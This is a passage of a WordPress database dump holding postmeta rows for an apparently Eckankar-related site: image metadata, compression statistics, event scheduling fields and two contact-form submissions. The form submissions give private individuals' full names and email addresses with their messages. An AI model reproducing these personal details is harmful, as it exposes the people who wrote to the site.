idth\";i:210;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(82232,256908,'_wp_attached_file','2020/01/whiterocks-bluflower.jpg'),(82233,256908,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:366;s:6:\"height\";i:217;s:4:\"file\";s:32:\"2020/01/whiterocks-bluflower.jpg\";s:5:\"sizes\";a:7:{s:6:\"medium\";a:4:{s:4:\"file\";s:32:\"whiterocks-bluflower-300x178.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:178;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:32:\"whiterocks-bluflower-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"wcicon\";a:4:{s:4:\"file\";s:30:\"whiterocks-bluflower-48x48.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"wcsquare\";a:4:{s:4:\"file\";s:32:\"whiterocks-bluflower-300x217.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:217;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:7:\"wcsmall\";a:4:{s:4:\"file\";s:32:\"whiterocks-bluflower-250x148.jpg\";s:5:\"width\";i:250;s:6:\"height\";i:148;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"wcfixedheightsmall\";a:4:{s:4:\"file\";s:32:\"whiterocks-bluflower-304x180.jpg\";s:5:\"width\";i:304;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"wccarouselsmall\";a:4:{s:4:\"file\";s:32:\"whiterocks-bluflower-210x150.jpg\";s:5:\"width\";i:210;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(82263,256908,'original-file','2020/01/whiterocks-bluflower-updraft-pre-smush-original.jpg'),(82287,256907,'original-file','2020/01/tulips-1-updraft-pre-smush-original.jpg'),(82288,256907,'smush-complete','1'),(82289,256907,'smush-info','The file was compressed from 29.95 KB to 28.20 KB saving 5.82 percent using WP-Optimize'),(82290,256907,'smush-stats','a:4:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:30665;s:12:\"smushed-size\";i:28880;s:15:\"savings-percent\";d:5.82;}'),(82291,256906,'original-file','2020/01/stacked-rocks-updraft-pre-smush-original.jpg'),(82292,256906,'smush-complete','1'),(82293,256906,'smush-info','The file was compressed from 19.34 KB to 18.54 KB saving 4.14 percent using WP-Optimize'),(82294,256906,'smush-stats','a:4:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:19806;s:12:\"smushed-size\";i:18987;s:15:\"savings-percent\";d:4.14;}'),(82295,256905,'original-file','2020/01/rocks-sea-1-updraft-pre-smush-original.jpg'),(82296,256905,'smush-complete','1'),(82297,256905,'smush-info','The file was compressed from 25.43 KB to 24.25 KB saving 4.67 percent using WP-Optimize'),(82298,256905,'smush-stats','a:4:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:26045;s:12:\"smushed-size\";i:24830;s:15:\"savings-percent\";d:4.67;}'),(82299,256904,'original-file','2020/01/rocks-in-clear-stream-updraft-pre-smush-original.jpg'),(82300,256904,'smush-complete','1'),(82301,256904,'smush-info','The file was compressed from 32.92 KB to 30.99 KB saving 5.87 percent using WP-Optimize'),(82302,256904,'smush-stats','a:4:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:33710;s:12:\"smushed-size\";i:31732;s:15:\"savings-percent\";d:5.87;}'),(82303,256900,'original-file','2020/01/bluerocks-butterfly-updraft-pre-smush-original.jpg'),(82304,256900,'smush-complete','1'),(82305,256900,'smush-info','The file was compressed from 25.54 KB to 24.23 KB saving 5.15 percent using WP-Optimize'),(82306,256900,'smush-stats','a:4:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:26158;s:12:\"smushed-size\";i:24812;s:15:\"savings-percent\";d:5.15;}'),(82307,256899,'original-file','2020/01/blubutterfly-orange-flower-updraft-pre-smush-original.jpg'),(82308,256899,'smush-complete','1'),(82309,256899,'smush-info','The file was compressed from 24.62 KB to 23.48 KB saving 4.61 percent using WP-Optimize'),(82310,256899,'smush-stats','a:4:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:25206;s:12:\"smushed-size\";i:24043;s:15:\"savings-percent\";d:4.61;}'),(82408,257041,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:173;s:6:\"height\";i:216;s:4:\"file\";s:28:\"2020/01/harold-bg-tabs-H.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:28:\"harold-bg-tabs-H-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"wcicon\";a:4:{s:4:\"file\";s:26:\"harold-bg-tabs-H-48x48.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"wcfixedheightsmall\";a:4:{s:4:\"file\";s:28:\"harold-bg-tabs-H-144x180.jpg\";s:5:\"width\";i:144;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"wccarouselsmall\";a:4:{s:4:\"file\";s:28:\"harold-bg-tabs-H-173x150.jpg\";s:5:\"width\";i:173;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(82409,257041,'_wp_attachment_image_alt','Harold Klemp - The Spiritual Leader of Eckankar'),(82480,257041,'original-file','2020/01/harold-bg-tabs-H-updraft-pre-smush-original.jpg'),(82481,257041,'smush-complete','1'),(82482,257041,'smush-info','The file was compressed from 12.89 KB to 12.35 KB saving 4.17 percent using WP-Optimize'),(82483,257041,'smush-stats','a:4:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:13198;s:12:\"smushed-size\";i:12648;s:15:\"savings-percent\";d:4.17;}'),(82536,257090,'_field_133','MIKE'),(82537,257090,'_field_134','BOONE'),(82538,257090,'_field_135','knotafarm@hotmail.com'),(82539,257090,'_field_137','Training'),(82540,257090,'_field_138','When is Arahatas training.  \n\n\n\n\n\n\n\n'),(82541,257090,'_form_id','13'),(82542,257090,'_seq_num','37'),(82543,257091,'_field_133','Matthew'),(82544,257091,'_field_134','Pederson'),(82545,257091,'_field_135','pederson.matthew@tuta.io'),(82546,257091,'_field_137','Contact info for Harold Klemp?'),(82547,257091,'_field_138','Greetings! I was wondering if Sri Harold Klemp had a direct email address, that I could send a message to? Thank you!'),(82548,257091,'_form_id','13'),(82549,257091,'_seq_num','38'),(82738,257171,'protect_children',''),(82739,257171,'_tribe_modified_fields','a:24:{s:16:\"protect_children\";i:1580464845;s:12:\"_EventOrigin\";i:1580464845;s:10:\"_edit_last\";i:1580464860;s:10:\"post_title\";i:1580464860;s:11:\"post_status\";i:1580465197;s:12:\"post_content\";i:1580465319;s:16:\"tribe_events_cat\";i:1580490396;s:24:\"boldgrid_hide_page_title\";i:1580465197;s:16:\"_EventRecurrence\";i:1580465197;s:17:\"_EventShowMapLink\";i:1580465197;s:13:\"_EventShowMap\";i:1580465197;s:13:\"_EventVenueID\";i:1580465197;s:15:\"_EventStartDate\";i:1580465197;s:13:\"_EventEndDate\";i:1580465197;s:18:\"_EventStartDateUTC\";i:1580465197;s:16:\"_EventEndDateUTC\";i:1580465197;s:14:\"_EventDuration\";i:1580465197;s:20:\"_EventCurrencySymbol\";i:1580465197;s:22:\"_EventCurrencyPosition\";i:1580465197;s:10:\"_EventCost\";i:1580465197;s:9:\"_EventURL\";i:1580465197;s:14:\"_EventTimezone\";i:1580465197;s:18:\"_EventTimezoneAbbr\";i:1580465197;s:13:\"_thumbnail_id\";i:1580465246;}'),(82740,257171,'_EventOrigin','events-calendar'),(82749,257171,'_edit_lock','1580490934:2'),(82750,257171,'_edit_last','2'),(82759,257171,'boldgrid_hide_page_title','1'),(82773,257171,'_EventRecurrence','a:3:{s:5:\"rules\";a:0:{}s:10:\"exclusions\";a:0:{}s:11:\"description\";N;}'),(82774,257171,'_EventShowMapLink','1'),(82775,257171,'_EventShowMap','1'),(82776,257171,'_EventVenueID','51976'),(82777,257171,'_EventStartDate','2020-02-09 12:15:00'),(82778,257171,'_EventEndDate','2020-02-09 13:15:00'),(82779,257171,'_EventStartDateUTC','2020-02-09 19:15:00'),(82780,257171,'_EventEndDateUTC','2020-02-09 20:15:00'),(82781,257171,'_EventDuration','3600'),(82782,257171,'_EventCurrencySymbol',''),(82783,257171,'_EventCurrencyPosition','prefix'),(82784,257171,'_EventCost',''),(82785,257171,'_EventURL',''),(82786,257171,'_EventTimezone','America/Denver'),(82787,257171,'_EventTimezoneAbbr','MST'),(82834,257222,'protect_children',''),(82835,257222,'_tribe_modified_fields','a:24:{s:16:\"protect_children\";i:1580465964;s:12:\"_EventOrigin\";i:1580465964;s:10:\"_edit_last\";i:1580465977;s:10:\"post_title\";i:1580465977;s:11:\"post_status\";i:1580466727;s:12:\"post_content\";i:1580466727;s:16:\"tribe_events_cat\";i:1580491926;s:13:\"_thumbnail_id\";i:1580466726;s:24:\"boldgrid_hide_page_title\";i:1580466727;s:16:\"_EventRecurrence\";i:1580466727;s:17:\"_EventShowMapLink\";i:1580466727;s:13:\"_EventShowMap\";i:1580466727;s:13:\"_EventVenueID\";i:1580466727;s:15:\"_EventStartDate\";i:1580466727;s:13:\"_EventEndDate\";i:1580466727;s:18:\"_EventStartDateUTC\";i:1580466727;s:16:\"_EventEndDateUTC\";i:1580466727;s:14:\"_EventDuration\";i:1580466727;s:20:\"_EventCurrencySymbol\";i:1580466727;s:22:\"_EventCurrencyPosition\";i:1580466727;s:10:\"_EventCost\";i:1580466727;s:9:\"_EventURL\";i:1580466727;s:14:\"_EventTimezone\";i:1580466727;s:18:\"_EventTimezoneAbbr\";i:1580466727;}'),(82836,257222,'_EventOrigin','events-calendar'),(82845,257222,'_edit_lock','1580491850:2'),(82846,257222,'_edit_last','2'),(82848,257222,'boldgrid_hide_page_title','1'),(82862,257222,'_EventRecurrence','a:3:{s:5:\"rules\";a:0:{}s:10:\"exclusions\";a:0:{}s:11:\"description\";N;}'),(82863,257222,'_EventShowMapLink','1'),(82864,257222,'_EventShowMap','1'),(82865,257222,'_EventVenueID','51976'),(82866,257222,'_EventStartDate','2020-03-28 09:00:00'),(82867,257222,'_EventEndDate','2020-03-28 16:30:00'),(82868,257222,'_EventStartDateUTC','2020-03-28 15:00:00'),(82869,257222,'_EventEndDateUTC','2020-03-28 22:30:00'),(82870,257222,'_EventDuration','27000'),(82871,257222,'_EventCurrencySymbol',''),(82872,257222,'_EventCurrencyPosition','prefix'),(82873,257222,'_EventCost',''),(82874,257222,'_EventURL',''),(82875,257222,'_EventTimezone','America/Denver'),(82876,257222,'_EventTimezoneAbbr','MDT'),(119359,262972,'_RTECregistrationsDisabled','1'),(119360,262972,'_RTECdeadlineType','start'),(119361,262972,'_RTECwhoCanRegister','any'),(119357,262972,'_EventOrigin','events-calendar'),(119365,262972,'_EventRecurrence','a:3:{s:5:\"rules\";a:1:{i:0;a:6:{s:4:\"type\";s:6:\"Custom\";s:6:\"custom\";a:4:{s:8:\"interval\";s:1:\"1\";s:5:\"month\";a:3:{s:8:\"same-day\";s:2:\"no\";s:6:\"number\";s:5:\"Third\";s:3:\"day\";s:1:\"7\";}s:9:\"same-time\";s:3:\"yes\";s:4:\"type\";s:7:\"Monthly\";}s:8:\"end-type\";s:2:\"On\";s:3:\"end\";s:10:\"2021-10-17\";s:14:\"EventStartDate\";s:19:\"2020-12-20 09:00:00\";s:12:\"EventEndDate\";s:19:\"2020-12-20 10:15:00\";}}s:10:\"exclusions\";a:0:{}s:11:\"description\";N;}'),(119363,262972,'_RTECmaxRegistrations','30'),(119355,262972,'protect_children',''),(119356,262972,'_tribe_modified_fields','a:20:{s:12:\"_EventOrigin\";i:1607545642;s:16:\"protect_children\";i:1607545642;s:13:\"_thumbnail_id\";i:1607545642;s:26:\"_RTECregistrationsDisabled\";i:1607545642;s:17:\"_RTECdeadlineType\";i:1607545642;s:19:\"_RTECwhoCanRegister\";i:1607545642;s:23:\"_RTEClimitRegistrations\";i:1607545642;s:21:\"_RTECmaxRegistrations\";i:1607545642;s:24:\"boldgrid_hide_page_title\";i:1607545642;s:16:\"_EventRecurrence\";i:1607545642;s:17:\"_EventShowMapLink\";i:1607545642;s:13:\"_EventShowMap\";i:1607545642;s:13:\"_EventVenueID\";i:1607545642;s:20:\"_EventCurrencySymbol\";i:1607545642;s:22:\"_EventCurrencyPosition\";i:1607545642;s:10:\"_EventCost\";i:1607545642;s:9:\"_EventURL\";i:1607545642;s:14:\"_EventTimezone\";i:1607545642;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1607545642;s:16:\"tribe_events_cat\";i:1607570842;}'),(119349,262972,'_EventStartDate','2021-10-17 09:00:00'),(119364,262972,'boldgrid_hide_page_title','0'),(119350,262972,'_EventStartDateUTC','2021-10-17 15:00:00'),(119351,262972,'_EventEndDate','2021-10-17 10:15:00'),(119352,262972,'_EventEndDateUTC','2021-10-17 16:15:00'),(119353,262972,'_EventDuration','4500'),(119354,262972,'_tribe_modified_fields','a:20:{s:12:\"_EventOrigin\";i:1607545642;s:16:\"protect_children\";i:1607545642;s:13:\"_thumbnail_id\";i:1607545642;s:26:\"_RTECregistrationsDisabled\";i:1607545642;s:17:\"_RTECdeadlineType\";i:1607545642;s:19:\"_RTECwhoCanRegister\";i:1607545642;s:23:\"_RTEClimitRegistrations\";i:1607545642;s:21:\"_RTECmaxRegistrations\";i:1607545642;s:24:\"boldgrid_hide_page_title\";i:1607545642;s:16:\"_EventRecurrence\";i:1607545642;s:17:\"_EventShowMapLink\";i:1607545642;s:13:\"_EventShowMap\";i:1607545642;s:13:\"_EventVenueID\";i:1607545642;s:20:\"_EventCurrencySymbol\";i:1607545642;s:22:\"_EventCurrencyPosition\";i:1607545642;s:10:\"_EventCost\";i:1607545642;s:9:\"_EventURL\";i:1607545642;s:14:\"_EventTimezone\";i:1607545642;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1607545642;s:16:\"tribe_events_cat\";i:1607570842;}'),(119341,262971,'_EventCurrencyPosition','prefix'),(119340,262971,'_EventCurrencySymbol',''),(119339,262971,'_EventVenueID','262507'),(119338,262971,'_EventShowMap','1'),(119328,262971,'_EventOrigin','events-calendar'),(151789,266079,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:623;s:6:\"height\";i:350;s:4:\"file\";s:24:\"2021/12/greek-ruin-1.jpg\";s:5:\"sizes\";a:7:{s:6:\"medium\";a:4:{s:4:\"file\";s:24:\"greek-ruin-1-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:24:\"greek-ruin-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumblist\";a:4:{s:4:\"file\";s:24:\"greek-ruin-1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"meccarouselthumb\";a:4:{s:4:\"file\";s:24:\"greek-ruin-1-474x324.jpg\";s:5:\"width\";i:474;s:6:\"height\";i:324;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"gridsquare\";a:4:{s:4:\"file\";s:24:\"greek-ruin-1-391x260.jpg\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"tileview\";a:4:{s:4:\"file\";s:24:\"greek-ruin-1-300x350.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:350;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"gg_gallery_thumbnail\";a:4:{s:4:\"file\";s:24:\"greek-ruin-1-450x250.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(119331,262971,'_RTECdeadlineType','start'),(119332,262971,'_RTECwhoCanRegister','any'),(119333,262971,'_RTEClimitRegistrations','0'),(119334,262971,'_RTECmaxRegistrations','30'),(119335,262971,'boldgrid_hide_page_title','0'),(82952,257270,'protect_children',''),(82953,257270,'_tribe_modified_fields','a:24:{s:16:\"protect_children\";i:1580466989;s:12:\"_EventOrigin\";i:1580466989;s:10:\"_edit_last\";i:1580467014;s:10:\"post_title\";i:1580467014;s:12:\"post_content\";i:1580467479;s:11:\"post_status\";i:1580467321;s:16:\"tribe_events_cat\";i:1582839029;s:13:\"_thumbnail_id\";i:1580467321;s:24:\"boldgrid_hide_page_title\";i:1580467321;s:16:\"_EventRecurrence\";i:1580467321;s:17:\"_EventShowMapLink\";i:1580467321;s:13:\"_EventShowMap\";i:1580467321;s:13:\"_EventVenueID\";i:1580467321;s:15:\"_EventStartDate\";i:1582813831;s:13:\"_EventEndDate\";i:1582813831;s:18:\"_EventStartDateUTC\";i:1582813831;s:16:\"_EventEndDateUTC\";i:1582813831;s:14:\"_EventDuration\";i:1582813831;s:20:\"_EventCurrencySymbol\";i:1580467321;s:22:\"_EventCurrencyPosition\";i:1580467321;s:10:\"_EventCost\";i:1580467321;s:9:\"_EventURL\";i:1580467321;s:14:\"_EventTimezone\";i:1580467321;s:18:\"_EventTimezoneAbbr\";i:1582813831;}'),(82954,257270,'_EventOrigin','events-calendar'),(82963,257270,'_edit_lock','1582839111:2'),(82964,257270,'_edit_last','2'),(82966,257270,'boldgrid_hide_page_title','1'),(82980,257270,'_EventRecurrence','a:3:{s:5:\"rules\";a:0:{}s:10:\"exclusions\";a:0:{}s:11:\"description\";N;}'),(82981,257270,'_EventShowMapLink','1'),(82982,257270,'_EventShowMap','1'),(82983,257270,'_EventVenueID','51976'),(82984,257270,'_EventStartDate','2020-03-29 10:30:00'),(82985,257270,'_EventEndDate','2020-03-29 13:30:00'),(82986,257270,'_EventStartDateUTC','2020-03-29 16:30:00'),(82987,257270,'_EventEndDateUTC','2020-03-29 19:30:00'),(82988,257270,'_EventDuration','10800'),(82989,257270,'_EventCurrencySymbol',''),(82990,257270,'_EventCurrencyPosition','prefix'),(82991,257270,'_EventCost',''),(82992,257270,'_EventURL',''),(82993,257270,'_EventTimezone','America/Denver'),(82994,257270,'_EventTimezoneAbbr','MDT'),(119322,262971,'_EventEndDate','2021-09-19 10:15:00'),(119323,262971,'_EventEndDateUTC','2021-09-19 16:15:00'),(119324,262971,'_EventDuration','4500'),(119325,262971,'_tribe_modified_fields','a:20:{s:12:\"_EventOrigin\";i:1607545642;s:16:\"protect_children\";i:1607545642;s:13:\"_thumbnail_id\";i:1607545642;s:26:\"_RTECregistrationsDisabled\";i:1607545642;s:17:\"_RTECdeadlineType\";i:1607545642;s:19:\"_RTECwhoCanRegister\";i:1607545642;s:23:\"_RTEClimitRegistrations\";i:1607545642;s:21:\"_RTECmaxRegistrations\";i:1607545642;s:24:\"boldgrid_hide_page_title\";i:1607545642;s:16:\"_EventRecurrence\";i:1607545642;s:17:\"_EventShowMapLink\";i:1607545642;s:13:\"_EventShowMap\";i:1607545642;s:13:\"_EventVenueID\";i:1607545642;s:20:\"_EventCurrencySymbol\";i:1607545642;s:22:\"_EventCurrencyPosition\";i:1607545642;s:10:\"_EventCost\";i:1607545642;s:9:\"_EventURL\";i:1607545642;s:14:\"_EventTimezone\";i:1607545642;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1607545642;s:16:\"tribe_events_cat\";i:1607570842;}'),(119327,262971,'_tribe_modified_fields','a:20:{s:12:\"_EventOrigin\";i:1607545642;s:16:\"protect_children\";i:1607545642;s:13:\"_thumbnail_id\";i:1607545642;s:26:\"_RTECregistrationsDisabled\";i:1607545642;s:17:\"_RTECdeadlineType\";i:1607545642;s:19:\"_RTECwhoCanRegister\";i:1607545642;s:23:\"_RTEClimitRegistrations\";i:1607545642;s:21:\"_RTECmaxRegistrations\";i:1607545642;s:24:\"boldgrid_hide_page_title\";i:1607545642;s:16:\"_EventRecurrence\";i:1607545642;s:17:\"_EventShowMapLink\";i:1607545642;s:13:\"_EventShowMap\";i:1607545642;s:13:\"_EventVenueID\";i:1607545642;s:20:\"_EventCurrencySymbol\";i:1607545642;s:22:\"_EventCurrencyPosition\";i:1607545642;s:10:\"_EventCost\";i:1607545642;s:9:\"_EventURL\";i:1607545642;s:14:\"_EventTimezone\";i:1607545642;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1607545642;s:16:\"tribe_events_cat\";i:1607570842;}'),(119330,262971,'_RTECregistrationsDisabled','1'),(119336,262971,'_EventRecurrence','a:3:{s:5:\"rules\";a:1:{i:0;a:6:{s:4:\"type\";s:6:\"Custom\";s:6:\"custom\";a:4:{s:8:\"interval\";s:1:\"1\";s:5:\"month\";a:3:{s:8:\"same-day\";s:2:\"no\";s:6:\"number\";s:5:\"Third\";s:3:\"day\";s:1:\"7\";}s:9:\"same-time\";s:3:\"yes\";s:4:\"type\";s:7:\"Monthly\";}s:8:\"end-type\";s:2:\"On\";s:3:\"end\";s:10:\"2021-10-17\";s:14:\"EventStartDate\";s:19:\"2020-12-20 09:00:00\";s:12:\"EventEndDate\";s:19:\"2020-12-20 10:15:00\";}}s:10:\"exclusions\";a:0:{}s:11:\"description\";N;}'),(119321,262971,'_EventStartDateUTC','2021-09-19 15:00:00'),(119320,262971,'_EventStartDate','2021-09-19 09:00:00'),(119326,262971,'protect_children',''),(119337,262971,'_EventShowMapLink','1'),(119299,262970,'_EventOrigin','events-calendar'),(119309,262970,'_EventShowMap','1'),(119310,262970,'_EventVenueID','262507'),(119311,262970,'_EventCurrencySymbol',''),(119312,262970,'_EventCurrencyPosition','prefix'),(119313,262970,'_EventCost',''),(119315,262970,'_EventTimezone','America/Denver'),(119301,262970,'_RTECregistrationsDisabled','1'),(119302,262970,'_RTECdeadlineType','start'),(119303,262970,'_RTECwhoCanRegister','any'),(119304,262970,'_RTEClimitRegistrations','0'),(119308,262970,'_EventShowMapLink','1'),(119305,262970,'_RTECmaxRegistrations','30'),(119306,262970,'boldgrid_hide_page_title','0'),(119307,262970,'_EventRecurrence','a:3:{s:5:\"rules\";a:1:{i:0;a:6:{s:4:\"type\";s:6:\"Custom\";s:6:\"custom\";a:4:{s:8:\"interval\";s:1:\"1\";s:5:\"month\";a:3:{s:8:\"same-day\";s:2:\"no\";s:6:\"number\";s:5:\"Third\";s:3:\"day\";s:1:\"7\";}s:9:\"same-time\";s:3:\"yes\";s:4:\"type\";s:7:\"Monthly\";}s:8:\"end-type\";s:2:\"On\";s:3:\"end\";s:10:\"2021-10-17\";s:14:\"EventStartDate\";s:19:\"2020-12-20 09:00:00\";s:12:\"EventEndDate\";s:19:\"2020-12-20 10:15:00\";}}s:10:\"exclusions\";a:0:{}s:11:\"description\";N;}'),(119295,262970,'_EventDuration','4500'),(119296,262970,'_tribe_modified_fields','a:20:{s:12:\"_EventOrigin\";i:1607545642;s:16:\"protect_children\";i:1607545642;s:13:\"_thumbnail_id\";i:1607545642;s:26:\"_RTECregistrationsDisabled\";i:1607545642;s:17:\"_RTECdeadlineType\";i:1607545642;s:19:\"_RTECwhoCanRegister\";i:1607545642;s:23:\"_RTEClimitRegistrations\";i:1607545642;s:21:\"_RTECmaxRegistrations\";i:1607545642;s:24:\"boldgrid_hide_page_title\";i:1607545642;s:16:\"_EventRecurrence\";i:1607545642;s:17:\"_EventShowMapLink\";i:1607545642;s:13:\"_EventShowMap\";i:1607545642;s:13:\"_EventVenueID\";i:1607545642;s:20:\"_EventCurrencySymbol\";i:1607545642;s:22:\"_EventCurrencyPosition\";i:1607545642;s:10:\"_EventCost\";i:1607545642;s:9:\"_EventURL\";i:1607545642;s:14:\"_EventTimezone\";i:1607545642;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1607545642;s:16:\"tribe_events_cat\";i:1607570842;}'),(119298,262970,'_tribe_modified_fields','a:20:{s:12:\"_EventOrigin\";i:1607545642;s:16:\"protect_children\";i:1607545642;s:13:\"_thumbnail_id\";i:1607545642;s:26:\"_RTECregistrationsDisabled\";i:1607545642;s:17:\"_RTECdeadlineType\";i:1607545642;s:19:\"_RTECwhoCanRegister\";i:1607545642;s:23:\"_RTEClimitRegistrations\";i:1607545642;s:21:\"_RTECmaxRegistrations\";i:1607545642;s:24:\"boldgrid_hide_page_title\";i:1607545642;s:16:\"_EventRecurrence\";i:1607545642;s:17:\"_EventShowMapLink\";i:1607545642;s:13:\"_EventShowMap\";i:1607545642;s:13:\"_EventVenueID\";i:1607545642;s:20:\"_EventCurrencySymbol\";i:1607545642;s:22:\"_EventCurrencyPosition\";i:1607545642;s:10:\"_EventCost\";i:1607545642;s:9:\"_EventURL\";i:1607545642;s:14:\"_EventTimezone\";i:1607545642;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1607545642;s:16:\"tribe_events_cat\";i:1607570842;}'),(119314,262970,'_EventURL',''),(119316,262970,'_TribeEventsPRO_RecurrenceQueue','a:5:{s:6:\"create\";a:10:{i:0;a:2:{s:9:\"timestamp\";i:1610874000;s:8:\"duration\";i:4500;}i:1;a:2:{s:9:\"timestamp\";i:1613898000;s:8:\"duration\";i:4500;}i:2;a:2:{s:9:\"timestamp\";i:1616317200;s:8:\"duration\";i:4500;}i:3;a:2:{s:9:\"timestamp\";i:1618736400;s:8:\"duration\";i:4500;}i:4;a:2:{s:9:\"timestamp\";i:1621155600;s:8:\"duration\";i:4500;}i:5;a:2:{s:9:\"timestamp\";i:1624179600;s:8:\"duration\";i:4500;}i:6;a:2:{s:9:\"timestamp\";i:1626598800;s:8:\"duration\";i:4500;}i:7;a:2:{s:9:\"timestamp\";i:1629018000;s:8:\"duration\";i:4500;}i:8;a:2:{s:9:\"timestamp\";i:1632042000;s:8:\"duration\";i:4500;}i:9;a:2:{s:9:\"timestamp\";i:1634461200;s:8:\"duration\";i:4500;}}s:6:\"update\";a:0:{}s:6:\"delete\";a:0:{}s:7:\"exclude\";a:0:{}s:8:\"original\";i:10;}'),(119294,262970,'_EventEndDateUTC','2021-08-15 16:15:00'),(119293,262970,'_EventEndDate','2021-08-15 10:15:00'),(119297,262970,'protect_children',''),(119291,262970,'_EventStartDate','2021-08-15 09:00:00'),(119292,262970,'_EventStartDateUTC','2021-08-15 15:00:00'),(119286,262969,'_EventTimezone','America/Denver'),(119285,262969,'_EventURL',''),(119284,262969,'_EventCost',''),(119283,262969,'_EventCurrencyPosition','prefix'),(119282,262969,'_EventCurrencySymbol',''),(118884,262956,'_EventStartDate','2021-04-11 09:00:00'),(118885,262956,'_EventStartDateUTC','2021-04-11 15:00:00'),(118900,262956,'_EventRecurrence','a:3:{s:5:\"rules\";a:1:{i:0;a:6:{s:4:\"type\";s:6:\"Custom\";s:6:\"custom\";a:4:{s:8:\"interval\";s:1:\"1\";s:5:\"month\";a:3:{s:8:\"same-day\";s:2:\"no\";s:6:\"number\";s:6:\"Second\";s:3:\"day\";s:1:\"7\";}s:9:\"same-time\";s:3:\"yes\";s:4:\"type\";s:7:\"Monthly\";}s:8:\"end-type\";s:2:\"On\";s:3:\"end\";s:10:\"2021-10-10\";s:14:\"EventStartDate\";s:19:\"2020-12-13 09:00:00\";s:12:\"EventEndDate\";s:19:\"2020-12-13 